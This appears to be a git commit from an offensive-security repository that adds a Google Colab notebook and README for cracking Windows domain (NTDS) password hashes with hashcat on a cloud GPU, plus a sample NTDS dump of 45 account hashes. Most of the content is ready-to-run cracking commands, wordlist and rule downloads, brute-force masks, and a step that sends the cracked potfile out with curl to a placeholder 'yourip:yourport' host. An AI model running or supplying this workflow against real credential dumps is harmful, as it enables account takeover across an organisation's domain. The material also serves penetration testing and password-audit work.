Example NTDS

main
Swissky 2020-12-21 16:40:58 +01:00
parent 96088a98d8
commit e011bf2098
3 changed files with 333 additions and 175 deletions

View File

@ -7,32 +7,46 @@ Néphélées (Νεφήλαι, Nephḗlai) : cloud nymphs greek - also ntds crack
## V1 - Google Colab ## V1 - Google Colab
Roll for Tesla P100
* https://github.com/ShutdownRepo/hashonymize * https://github.com/ShutdownRepo/hashonymize
* https://github.com/ShutdownRepo/google-colab-hashcat * https://github.com/ShutdownRepo/google-colab-hashcat
* https://github.com/mxrch/penglab * https://github.com/mxrch/penglab
* https://colab.research.google.com/drive/1arm1_HEMb868mk18FlLkEcqvHPB_Ibgb#scrollTo=lWPQqb3oETLd
```ps1 ```ps1
Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb
Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU. Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU.
Change the config by setting "True" at tools you want to install. Change the config by setting "True" at tools you want to install.
Select "Runtime" and "Run all" ! Select "Runtime" and "Run all" !
Workflow example 3 (OPSEC: crack anonymized hashes)
run the preparation script below
on your local machine, run hashonymize to anonymize your hash lists
upload your anon hashes list on the colab !wget http://yourip:yourport/yourfile
run a hashcat command like this to start cracking !hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt
recover the .pot file from the Google Colab !curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/
on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt
hashcat -m 1000 --potfile-path ntds.cracked ntds.tocrack --show --username
``` ```
* markov, keyboard walking, dico + rules , haveibeenpwn * markov, keyboard walking, dico + rules , haveibeenpwn
* reuse old pot (extract passwd to new wordlist) * reuse old pot (extract passwd to new wordlist)
Here are some of the most used attack modes for the `--attack-mode` option
```
0 Wordlist (with or without rules)
3 Pure bruteforce
```
Here are some of the most used hash types for the `--hash-type` option
```ps1
1000 NTLM (actually its for NT hashes)
3000 LM
5500 Net-NTLMv1 (actually, it should be called NTLMv1)
5600 Net-NTLMv2 (actually, it should be called NTLMv2)
13100 Kerberoast
18200 ASREProast
22000 WPA-PBKDF2-PMKID+EAPOL
16800 WPA-PMKID-PBKDF2
0 md5
100 sha1
1400 sha2-256
1700 sha2-512
# 2 hours
-a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1
```
## V2 - UI ## V2 - UI
* https://github.com/Coalfire-Research/npk * https://github.com/Coalfire-Research/npk

View File

@ -3,10 +3,9 @@
"nbformat_minor": 0, "nbformat_minor": 0,
"metadata": { "metadata": {
"colab": { "colab": {
"name": "google-colab-hashcat.ipynb", "name": "google_colab_hashcat.ipynb",
"provenance": [], "provenance": [],
"collapsed_sections": [], "collapsed_sections": []
"include_colab_link": true
}, },
"kernelspec": { "kernelspec": {
"name": "python3", "name": "python3",
@ -18,169 +17,187 @@
{ {
"cell_type": "markdown", "cell_type": "markdown",
"metadata": { "metadata": {
"id": "view-in-github", "id": "bcgg59uiIxrv"
"colab_type": "text"
}, },
"source": [ "source": [
"<a href=\"https://colab.research.google.com/github/ShutdownRepo/google-colab-hashcat/blob/main/google_colab_hashcat.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>" "# Nephelees - NTDS cracking on Google Colab\r\n",
] "1. Select \"Runtime\", \"Change runtime type\", and set \"Hardware accelerator\" to GPU. \r\n",
}, "2. Select \"Runtime\" and \"Run all\" !\r\n",
{ "1. on your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\r\n",
"cell_type": "markdown", "2. upload your anon hashes list on the colab `!wget http://yourip:yourport/yourfile` or with the upload button\r\n",
"metadata": { "3. install requirements\r\n",
"id": "2ommePNS-o92" "4. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\r\n",
}, "5. recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/`\r\n",
"source": [ "6. on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\r\n",
"# Google colab hash cracking\n", "\r\n",
"\n", "**/!\\** For every 12hrs or so Disk, RAM, VRAM, CPU cache etc data that is on our alloted virtual machine will get erased. "
"<p align=\"center\">\n",
" <a href=\"https://colab.research.google.com/github/ShutdownRepo/google-colab-hashcat/blob/main/google_colab_hashcat.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>\n",
" <a href=\"https://twitter.com/intent/follow?screen_name=_nwodtuhs\" title=\"Follow\"><img src=\"https://img.shields.io/twitter/follow/_nwodtuhs?label=Shutdown&style=social\"></a>\n",
"</p>\n",
"\n",
"## Workflow example 1 (simple wordlist)\n",
"\n",
"This Google colab can be used for hash cracking with wordlists and rules.\n",
"Here is an example of that can be followed to crack NT hashes.\n",
"\n",
"1. run the preparation script below\n",
"2. upload your hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
"3. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
"\n",
"## Workflow example 2 (wordlist + rules)\n",
"\n",
"This is an example that is especially useful for internal engagements where users often use a transformation of the corp name as password (i.e. Corp2016!).\n",
"\n",
"1. create a wordlist based on some names that are currently used in the company\n",
"```\n",
"company\n",
"cpmny\n",
"corp\n",
"management\n",
"admin\n",
"```\n",
"2. upload your hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
"3. run the hashcat command `!hashcat --status --hash-type 1000 --attack-mode 0 --username --rules-file rules/d3adhob0.rule DOMAIN.LOCAL.ntds company.lst`\n",
"\n",
"## Workflow example 3 (OPSEC: crack anonymized hashes)\n",
"\n",
"1. run the preparation script below\n",
"2. on your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\n",
"3. upload your anon hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
"4. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
"5. recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/`\n",
"6. on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
"\n",
"hashcat -m 1000 --potfile-path ntds.cracked ntds.tocrack --show --username\n",
"\n",
"## Short hashcat manual\n",
"\n",
"Here are some useful options\n",
"```\n",
"--status Enable automatic update of the status screen\n",
"--attack-mode Attack-mode, see references below\n",
"--hash-type Hash-type, see references below\n",
"--username Enable ignoring of usernames in hashfile \n",
"--rules-file Multiple rules applied to each word from wordlists\n",
"--potfile-path Specific path to potfile\n",
"```\n",
"\n",
"Here are some of the most used attack modes for the `--attack-mode` option\n",
"```\n",
"0 Wordlist (with or without rules)\n",
"3 Pure bruteforce\n",
"```\n",
"\n",
"Here are some of the most used hash types for the `--hash-type` option\n",
"```\n",
"1000 NTLM (actually it's for NT hashes)\n",
"3000 LM\n",
"5500 Net-NTLMv1 (actually, it should be called NTLMv1)\n",
"5600 Net-NTLMv2 (actually, it should be called NTLMv2)\n",
"13100 Kerberoast\n",
"18200 ASREProast\n",
"22000 WPA-PBKDF2-PMKID+EAPOL\n",
"16800 WPA-PMKID-PBKDF2\n",
"0 md5\n",
"100 sha1\n",
"1400 sha2-256\n",
"1700 sha2-512\n",
"```\n",
"\n",
"# Credits\n",
"Credits go to mxrch for his original project called [penglab](https://github.com/mxrch/penglab)"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "NMFCTYwaKtu7"
},
"source": [
"# Your hash cracking starts here"
] ]
}, },
{ {
"cell_type": "code", "cell_type": "code",
"metadata": { "metadata": {
"id": "7ucWO9luB4RG" "colab": {
"base_uri": "https://localhost:8080/"
},
"id": "A86GVzaW6YpT",
"outputId": "fbeb72d7-0174-4812-91fe-6e74dba550ce"
}, },
"source": [ "source": [
"# 1. Run the preparation basis\n", "# Check GPU (Tesla P100 is the best GPU on Colab)\r\n",
"# Edit the wordlists and rules you want\n", "!nvidia-smi -L"
"\n", ],
"rockyou = True\n", "execution_count": null,
"hashesorg2019 = False # huge wordlist (~12GB, ~6mins download)\n", "outputs": [
"quickrules = True # hob064.rule\n", {
"extensiverules = True # d3adhob0.rule\n", "output_type": "stream",
"\n", "text": [
"import os\n", "GPU 0: Tesla P100-PCIE-16GB (UUID: GPU-711e1706-fccb-c944-73a8-796eb7a9d342)\n"
"\n", ],
"def install():\n", "name": "stdout"
" rules_dir = \"rules\"\n", }
" wordlists_dir = \"wordlists\"\n", ]
" # Removing the default sample data\n", },
" !rm -r sample_data/\n", {
" # Installing hashcat\n", "cell_type": "code",
" print(\"[+] Installation of hashcat...\")\n", "metadata": {
" !apt install cmake build-essential -y\n", "id": "LWWa641VMu7Y"
" !apt install checkinstall git -y\n", },
" !git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install\n", "source": [
"\n", "# Install Hashcat\r\n",
" # Installing wordlists\n", "!apt install cmake build-essential -y\r\n",
" os.system(\"wordlists_dir={}\".format(wordlists_dir))\n", "!apt install checkinstall git -y\r\n",
" !mkdir ./$wordlists_dir\n", "!git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install"
" if rockyou:\n", ],
" !printf \"[+] Downloading the Rockyou wordlist...\\n\"\n", "execution_count": null,
" !cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\n", "outputs": []
" !printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\n", },
" !cd $wordlists_dir && gunzip rockyou.txt.gz\n", {
" !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\n", "cell_type": "code",
"\n", "metadata": {
" if hashesorg2019:\n", "id": "_M4BMeXCNCA8",
" !printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\n", "colab": {
" !cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\n", "base_uri": "https://localhost:8080/"
" !printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\n", },
" !cd $wordlists_dir && gunzip hashesorg2019.gz\n", "outputId": "f08a6696-17ca-4415-f572-402e96fb7717"
" !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\n", },
"\n", "source": [
" # Installing rules\n", "# Download wordlists\r\n",
" os.system(\"rules_dir={}\".format(rules_dir))\n", "import os\r\n",
" !mkdir ./$rules_dir\n", "wordlists_dir = \"wordlists\"\r\n",
" if quickrules:\n", "os.system(\"wordlists_dir={}\".format(wordlists_dir))\r\n",
" !printf \"[+] Downloading the hob064 ruleset...\\n\"\n", "!mkdir ./$wordlists_dir\r\n",
" !cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\n", "\r\n",
" !printf \"[+] Rules downloaded !\\n\"\n", "!printf \"[+] Downloading the Rockyou wordlist...\\n\"\r\n",
" !printf \"[+] Location : $(pwd)/$rules_dir/$(ls rules | grep hob064)\"\n", "!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\r\n",
" if extensiverules:\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
" !printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\n", "!cd $wordlists_dir && gunzip rockyou.txt.gz\r\n",
" !cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\n", "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\r\n",
" !printf \"[+] Rules downloaded !\\n\"\n", "\r\n",
" !printf \"[+] Location : $(pwd)/$rules_dir/$(ls rules | grep d3adhob0)\"\n", "!printf \"[+] Downloading the KerberoastPW wordlist...\\n\"\r\n",
"\n", "!cd $wordlists_dir && wget https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\r\n",
"install()\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
"!printf \"\\n[+] Install is over, listing rules and wordlists...\\n\"\n", "!cd $wordlists_dir && unxz kerberoast_pws.xz\r\n",
"!ls rules wordlists" "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep kerberoast_pws)\"\r\n",
"\r\n",
"!printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\r\n",
"!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\r\n",
"!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
"!cd $wordlists_dir && gunzip hashesorg2019.gz\r\n",
"!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\r\n",
"\r\n",
"# !printf \"[+] Downloading the Have I been Pwned V7 wordlist...\\n\"\r\n",
"# !cd $wordlists_dir && wget https://hashes.org/download.php?type=found&hashlistId=8161 -O \tHaveIbeenPwnedV7.txt\r\n",
"# !printf \"[+] Wordlist downloaded !\\n[+]\\n\"\r\n",
"# !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep HaveIbeenPwnedV7)\"\r\n"
],
"execution_count": 20,
"outputs": [
{
"output_type": "stream",
"text": [
"mkdir: cannot create directory ./wordlists: File exists\n",
"[+] Downloading the Rockyou wordlist...\n",
"--2020-12-21 15:03:51-- https://download.weakpass.com/wordlists/90/rockyou.txt.gz\n",
"Resolving download.weakpass.com (download.weakpass.com)... 104.21.234.151, 104.21.234.150, 2606:4700:3038::6815:ea97, ...\n",
"Connecting to download.weakpass.com (download.weakpass.com)|104.21.234.151|:443... connected.\n",
"HTTP request sent, awaiting response... 200 OK\n",
"Length: 53357062 (51M) [application/octet-stream]\n",
"Saving to: rockyou.txt.gz\n",
"\n",
"rockyou.txt.gz 100%[===================>] 50.88M 11.8MB/s in 5.3s \n",
"\n",
"2020-12-21 15:03:56 (9.59 MB/s) - rockyou.txt.gz saved [53357062/53357062]\n",
"\n",
"[+] Wordlist downloaded !\n",
"[+] Extraction...\n",
"gzip: rockyou.txt already exists; do you wish to overwrite (y or n)? ^C\n",
"[+] Finished !\n",
"[+] Location : /content/wordlists/rockyou.txt\n",
"rockyou.txt.gz[+] Downloading the KerberoastPW wordlist...\n",
"--2020-12-21 15:05:19-- https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\n",
"Resolving gist.github.com (gist.github.com)... 192.30.255.113\n",
"Connecting to gist.github.com (gist.github.com)|192.30.255.113|:443... connected.\n",
"HTTP request sent, awaiting response... 301 Moved Permanently\n",
"Location: https://gist.githubusercontent.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz [following]\n",
"--2020-12-21 15:05:19-- https://gist.githubusercontent.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\n",
"Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...\n",
"Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|151.101.0.133|:443... connected.\n",
"HTTP request sent, awaiting response... 200 OK\n",
"Length: 98784072 (94M) [application/octet-stream]\n",
"Saving to: kerberoast_pws.xz.1\n",
"\n",
"kerberoast_pws.xz.1 100%[===================>] 94.21M 185MB/s in 0.5s \n",
"\n",
"2020-12-21 15:05:21 (185 MB/s) - kerberoast_pws.xz.1 saved [98784072/98784072]\n",
"\n",
"[+] Wordlist downloaded !\n",
"[+] Extraction...\n",
"unxz: kerberoast_pws: File exists\n",
"[+] Finished !\n",
"[+] Location : /content/wordlists/kerberoast_pws\n",
"kerberoast_pws.xz\n",
"kerberoast_pws.xz.1[+] Downloading the HashesOrg2019 wordlist...\n",
"--2020-12-21 15:05:21-- https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\n",
"Resolving download.weakpass.com (download.weakpass.com)... 104.21.234.150, 104.21.234.151, 2606:4700:3038::6815:ea97, ...\n",
"Connecting to download.weakpass.com (download.weakpass.com)|104.21.234.150|:443... connected.\n",
"HTTP request sent, awaiting response... 200 OK\n",
"Length: 4468104490 (4.2G) [application/octet-stream]\n",
"Saving to: hashesorg2019.gz\n",
"\n",
"hashesorg2019.gz 100%[===================>] 4.16G 11.7MB/s in 6m 0s \n",
"\n",
"2020-12-21 15:11:21 (11.9 MB/s) - hashesorg2019.gz saved [4468104490/4468104490]\n",
"\n",
"[+] Wordlist downloaded !\n",
"[+] Extraction...\n",
"[+] Finished !\n",
"[+] Location : /content/wordlists/hashesorg2019"
],
"name": "stdout"
}
]
},
{
"cell_type": "code",
"metadata": {
"id": "d1cxo70DQDxs"
},
"source": [
"# Download rules\r\n",
"import os\r\n",
"rules_dir = \"/content/hashcat/rules\"\r\n",
"os.system(\"rules_dir={}\".format(rules_dir))\r\n",
"!mkdir ./$rules_dir\r\n",
"\r\n",
"!printf \"[+] Downloading the hob064 ruleset...\\n\"\r\n",
"!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\r\n",
"!printf \"[+] Rules downloaded !\\n\"\r\n",
"!printf \"[+] Location : $(ls $rules_dir | grep hob064)\"\r\n",
"\r\n",
"!printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\r\n",
"!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\r\n",
"!printf \"[+] Rules downloaded !\\n\"\r\n",
"!printf \"[+] Location : $(ls $rules_dir | grep d3adhob0)\""
], ],
"execution_count": null, "execution_count": null,
"outputs": [] "outputs": []
@ -202,17 +219,99 @@
{ {
"cell_type": "code", "cell_type": "code",
"metadata": { "metadata": {
"id": "xYgvNWGbKXSp" "id": "xYgvNWGbKXSp",
"colab": {
"base_uri": "https://localhost:8080/"
},
"outputId": "cfbf1c6b-7d90-4108-fefa-e7566ad718b1"
}, },
"source": [ "source": [
"# 3. Crack your hashes\n", "# 3. Crack your hashes\n",
"# Examples\n", "\n",
"# !hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt\n", "# Quick cracking - rockyou wordlist - around 10 minutes\n",
"# !hashcat --status --hash-type 1000 --attack-mode 0 --username --rules-file rules/hob064.rule DOMAIN.LOCAL.ntds company.lst\n", "# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --username\n",
"!hashcat --benchmark" "# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/hob064.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/dive.rule --username\n",
"\n",
"# Medium cracking - kerberoast wordlist - around 30 minutes\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/hob064.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/dive.rule --username\n",
"\n",
"# Insane cracking - hashesorg2019 wordlist - several days ?\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --username\n",
"!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/hob064.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/dive.rule --username\n",
"\n",
"# ----- around 3 hours on a p100 ------\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1\n",
"# ----- more than 3 days on a P100 --------\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a \n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a"
], ],
"execution_count": null, "execution_count": null,
"outputs": [] "outputs": [
{
"output_type": "stream",
"text": [
"hashcat (v6.1.1-120-g15bf8b730) starting...\n",
"\n",
"\u001b[31mnvmlDeviceGetFanSpeed(): Not Supported\u001b[0m\n",
"\n",
"CUDA API (CUDA 10.1)\n",
"====================\n",
"* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU\n",
"\n",
"OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]\n",
"========================================================================\n",
"* Device #2: Tesla P100-PCIE-16GB, skipped\n",
"\n",
"Minimum password length supported by kernel: 0\n",
"Maximum password length supported by kernel: 27\n",
"\n",
"Hashes: 45 digests; 45 unique digests, 1 unique salts\n",
"Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates\n",
"Rules: 64\n",
"\n",
"Applicable optimizers applied:\n",
"* Optimized-Kernel\n",
"* Zero-Byte\n",
"* Precompute-Init\n",
"* Meet-In-The-Middle\n",
"* Early-Skip\n",
"* Not-Salted\n",
"* Not-Iterated\n",
"* Single-Salt\n",
"* Raw-Hash\n",
"\n",
"Watchdog: Temperature abort trigger set to 90c\n",
"\n",
"INFO: Removed 27 hashes found in potfile.\n",
"\n",
"Host memory required for this attack: 983 MB\n",
"\n",
"Dictionary cache hit:\n",
"* Filename..: /content/wordlists/hashesorg2019\n",
"* Passwords.: 1279729109\n",
"* Bytes.....: 13733214816\n",
"* Keyspace..: 81902662976\n",
"\n",
"\u001b[33mCracking performance lower than expected?\u001b[0m\n",
"\u001b[33m\u001b[0m\n",
"\u001b[33m* Update your backend API runtime / driver the right way:\u001b[0m\n",
"\u001b[33m https://hashcat.net/faq/wrongdriver\u001b[0m\n",
"\u001b[33m\u001b[0m\n",
"\u001b[33m* Create more work items to make use of your parallelization power:\u001b[0m\n",
"\u001b[33m https://hashcat.net/faq/morework\u001b[0m\n",
"\u001b[33m\u001b[0m\n",
"[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => "
],
"name": "stdout"
}
]
} }
] ]
} }

45
ntds/example.ntds Normal file
View File

@ -0,0 +1,45 @@
Administrator:500:111f37ed915c5716aad3b435b51404ee:eb37f9cd74303274cb923442a7348ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:422feb7ef3b8cbea98bf9f0f76a50d81:::
ADDEMO$:1003:aad3b435b51404eeaad3b435b51404ee:d5d1a3d8e2ee4032ec4831c9f9342309:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f031bf1f16bba6f9de84dffcc164e0f8:::
user01:1106:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
user02:1107:aad3b435b51404eeaad3b435b51404ee:e550853afc9a68106d73fd6680b25604:::
user03:1108:56c94ea187dbb8d6d4b8a9676de6053e:9aeae4ad385c29a8d3e25a2032df95ec:::
user04:1109:58ee1ecfcb1952c1aad3b435b51404ee:2a54f9c00701830e44923a19eea7df62:::
user05:1110:22d8afdd59cc02d1aad3b435b51404ee:336413710df33e5d6ef4ba82ba762543:::
user06:1111:843201b3eec511e619d76dfe3931be22:8810b6cff094d7bbfa9254a47e460e8c:::
user07:1112:d0d0b0a89785fea7dacc48edf1058ae1:d10107259670c218d8389bb05a6ca9a5:::
user08:1113:eb9fdbf6dde9d8a3c3f5ba53c6ea977d:81ed9d39c208fb710f16fd01df2c5ea3:::
user09:1114:ee3c975e9312263ac2265b23734e0dac:0d870c8d2ed66211a6cd19b6c8c6939a:::
user10:1115:e69e57fcbfc3742627bcbf149915a329:c1d5ff9561074a64e8164745f7e057a3:::
user11:1116:aad3b435b51404eeaad3b435b51404ee:125fee170ce858738fc08d61291174ed:::
user12:1117:3c152122664981d07a01665eb2eb6c14:3081116936973f2a1019178a085e77cd:::
user13:1118:aad3b435b51404eeaad3b435b51404ee:3f77a049f85d9ecb089313d68dc64796:::
user14:1119:6595863b3f65214eaad3b435b51404ee:7f5ab070d31e61251ab4ef78b6601941:::
user15:1120:8dfa87789573aa6caad3b435b51404ee:0794f987708fd36dc158c3435d1e9d65:::
user16:1121:bfa8b0f05b2ce944158759f68c114883:f85bbc519f1d4b9453d0d316d2f43efd:::
user17:1122:63aa06ca844a0123aad3b435b51404ee:5bd6fddd235507a2baf82843b6174b4e:::
user18:1123:aad3b435b51404eeaad3b435b51404ee:8d15a7e3fe3271b73180de20f9532111:::
user19:1124:078198d4eefc6c55aad3b435b51404ee:c09c4e921a0f7763e22aa5f38d73016a:::
user20:1125:44f388db34bb96628358f3d2c80c1dc5:9180c11efd4cb6149557f59b0cf80573:::
user21:1126:fdcfc2afb2d1be34aad3b435b51404ee:adc5df4b1f4a1b2501bbeef236f5be92:::
user22:1127:9fdfa4280126e140aad3b435b51404ee:2a3d0e353eadfb8c7b5d7d503efad47d:::
user23:1128:b273d8f0d4cb5bbcaad3b435b51404ee:b6c0168748dcdba30141914c959d9f8c:::
user24:1129:6d91129363e71245aad3b435b51404ee:e14af367857363b0f16418bcce9f96b9:::
user25:1130:9ad12257392cdacaaad3b435b51404ee:c57128805cc3e445a338126080ce52bb:::
user26:1131:12bd073e0404ed39aad3b435b51404ee:024b7f87b902332ac1369f2fd1a1d4e9:::
user27:1132:d12e81eacd737b89aad3b435b51404ee:23f8c70f8c51c5535e4ef372ffe9500a:::
user28:1133:adfc3aa0a57f3d1e944e2df489a880e4:458d16d08f6ba7c5c61cd3850b704015:::
user29:1134:5971713f415d2ff41104594f8c2ef12b:85ec40bb1fadfcd4f1cdd8f5c745338a:::
user30:1135:9ede745407ca42b2036d85e885962cfa:584c3288cdb9249191d01028fc3c1d06:::
user31:1136:3ceb8cc097f4b3bc274d6a66ff41a32b:a474953d36f287fefc73f8917ca27290:::
user32:1137:863a6a296d3d379888d84c068ac05e0a:80fadb7eb493333387c36c3a30a86a9c:::
user33:1138:e7c148e3c455aa1f8138c5e16c20cfc5:236ff73b5ec46c68c37d27d51bd4fa8f:::
user34:1139:c8e4acdacab3b81243b673bc86137536:2fce06c6e6303f0850416dfe57f809ac:::
user35:1140:aad3b435b51404eeaad3b435b51404ee:7b7b36c886e37d0a569de1eac512cf89:::
user36:1141:aad3b435b51404eeaad3b435b51404ee:4626a36dd0eccfcf71e13868990aaada:::
user37:1142:aad3b435b51404eeaad3b435b51404ee:c38307aa05d879e26becaa8156421571:::
user38:1143:aad3b435b51404eeaad3b435b51404ee:d97004b9867c89bdae80a4673d45ac0d:::
user39:1144:aad3b435b51404eeaad3b435b51404ee:b7ea6aa900be567c319f60add47db080:::
user40:1145:aad3b435b51404eeaad3b435b51404ee:28a198884cf2e2f4a7982333e89bd344:::